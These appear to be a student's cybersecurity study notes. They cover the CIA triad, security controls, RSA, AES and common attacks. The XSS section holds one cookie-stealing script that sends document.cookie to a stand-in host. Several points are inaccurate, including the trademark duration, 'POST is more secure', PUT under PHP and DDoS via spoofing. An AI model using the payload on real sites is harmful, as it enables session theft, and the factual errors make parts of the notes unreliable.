Cybersecurity Essentials: Threats, Controls, and Encryption

Classified in Computers

Written at on English with a size of 4.71 KB.

CIA Triad

The CIA Triad consists of Confidentiality, Integrity, and Availability. Related concepts include Authentication, Accountability, and Auditability.

Types of Harm

  • Interception
  • Interruption
  • Modification
  • Fabrication

Web Technologies

HTML

  • GET: Embeds parameters into the URL.
  • POST: Sends data directly to the server; more secure.

PHP

  • PUT: Used to create or replace a file at the specified URL. Sends data like POST, more suitable for uploading files.

Penetration Testing

5 Steps to Penetration Testing:

  1. Reconnaissance
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Clearing Tracks

Security Controls

  • Prevention: Outright stopping an attack.
  • Deterrence: Making an attack harder.
  • Deflection: Making a target less attractive.
  • Mitigation: Lessening the harm.
  • Detection: Identifying an attack.
  • Recovery: Redressing harm caused by an attack.

Types of Controls

  • Physical: Locks, guards.
  • Procedural: Scanning IDs.
  • Technical: Passwords, encryption.

Intellectual Property Law

  • Copyright: Protects creative works.
  • Patent: Protects inventions; lasts for 20 years.
  • Trademark: Protects brand names; lasts as long as the company exists plus 10 years.

RSA Encryption

RSA is an asymmetric algorithm that uses public keys for encryption and private keys for decryption.

Ethical Frameworks

  • Teleological: Focuses on outcomes/consequences. Good outcomes equate to morally good actions.
  • Deontological: Moral good is based on good principles, following laws and ethics, and appealing to authority.

Block Cipher Advantages

Block Cipher Advantage over Character-by-Character: Harder to cryptanalyze; 2^128 possible values.

Why ShiftRows is Important in AES

Without ShiftRows, there would be no mixing of columns, effectively making AES a 64-bit cipher instead of a 128-bit cipher.

How Galois Fields are Useful for Symmetric Encryption

Every operation on an n-bit number stays within n-bits, meaning the message size remains constant. Because each number has a multiplicative and additive inverse, every step is reversible, allowing decryption to be a step-by-step reversal of encryption. While modular arithmetic over 256 provides additive invertibility, it does not provide multiplicative invertibility—a Galois field is needed for that. Having two operations to work with increases the complexity of the encryption.

RSA Formulas

  • Encryption: c = (m)e % n
  • Decryption: m = (c)d % n

Where: m = message, e = encryption key, d = decryption key, n = p * q, c = ciphertext

Cyber Attacks

Dictionary Attack

Uses a set of passwords, hashes them, and checks them against stolen hashed passwords. Still possible if passwords are salted.

Rainbow Table Attack

Uses a set of password/hash pairs and checks a set of stolen passwords for matching hashes. If a match is found, the password is looked up in a table. Infeasible if passwords are salted.

DDoS (Distributed Denial of Service) Attack

Uses IP spoofing to flood a service with seemingly legitimate requests to the point where it cannot respond.

XSS (Cross-Site Scripting)

HTML injection using JavaScript. A sample script to send a hacker your cookies: <script>location.href='https://example.com/cookie='+document.cookie</script>

Calculating Bits for Passwords

Formula: Lg2(# of available characters) = # of bits per character
Total bits = bits per character * # of characters in password

Salt and Pepper

  • Salt: A large random number (e.g., 256 bits) generated per user.
  • Pepper: Also a large random number, but one pepper is used per service and is not stored in the database (making it harder to steal).
Karma: 8%
Visits: 0

Entradas relacionadas:

Tags:
Cybersecurity Ethical Hacking Penetration Testing Risk Management Cryptography Data Security Intellectual Property CIA Triad Network Security Encryption Attacks